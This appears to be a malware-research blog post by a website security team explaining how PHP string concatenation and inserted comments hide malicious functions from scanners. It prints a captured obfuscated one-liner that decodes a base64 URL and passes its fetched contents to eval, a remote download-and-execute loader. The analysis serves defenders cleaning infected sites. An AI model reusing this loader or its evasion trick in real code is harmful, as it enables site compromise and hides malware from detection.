While string concatenation has many valuable applications in development — such as making code more efficient or functions more effective — it is also a popular way for attackers to obfuscate code and try to make it more difficult to detect. Let’s dig into how bad actors are leveraging this technique to conceal their malware.
Avoiding Detection with String Concatenation
String concatenation obfuscation works by using a period between each string, which instructs PHP to join these character strings together and run it as a single function — for example, ‘cr’.’ea’.’te’.’_f’.’un’.’c’.’ti’.’o’.’n’; would become create_function. This is done to avoid the detection of commands like base64_decode and file_get_contents, which are commonly employed to perform malicious activities.
<?php $a = 'cr'.'ea'.'te'.'_f'.'un'.'c'.'ti'.'o'.'n'; $f = $a('$a', 'E'./**/'v'.'A'./**/'l'.'(fil'.'e_g'.'et_c'.'onte'.'nts'.'(b'.'as'.'e6'.'4_d'.'ec'.'od'.'e'.'("a'.'HR'.'0cDovL2'.'5hdGl2ZXJlZ'.'GlyLnR'.'rL2x4LzEu'.'dHh0")));'); $f(1); ?>
In this example, the malware concatenates the strings ‘create_function’ and ‘eval(file_get_contents(base64_decode(‘.
The function file_get_contents pulls code from an external website (hxxp://nativeredir[.]tk/lx/1.txt), which is then run through eval and executed. The attackers pull the code from an external source to maintain control and allow for flexibility — they can easily change the code they want to run by simply replacing the 1.txt file.
Pulling external code in this manner is common practice. In many cases, we find websites that have been compromised to be used to distribute malware. We’ve also found services like Pastebin and GitHub used to host malicious code for these purposes.
The code can also be easily modified to add comments in different places, just like you see in the example above (/**/). Comments like these can be placed between any string and make detection much harder, especially for malware removal tools that rely on strings found in the malware in order to detect it in the future. One popular method is to use a tool that adds random comments throughout the malware, making every sample slightly unique and more difficult to detect.
Applications of String Concatenation in Malware
While in this particular case the remote code injected hidden spam links to the victim’s website, it’s possible for bad actors to run any kind of malware or phishing in these types of scripts.. The code in the remote URL can also be modified to meet their requirements.
Samples like these clearly highlight how easy it is for attackers to obfuscate code. For example, if you’re a DIY type and you’re trying to clean up malware on your website, you might be looking for eval or file_get_contents, but in this case you won’t be able to detect those strings in this code.
We’re always happy to help if you need a hand with malware cleanup.
Krasimir Konov
Fernando Barbosa
Victor Santoyo
Ashley Sand
Luke Leal
Tony Perez
Sucuri Malware Research Team
Stephen Johnston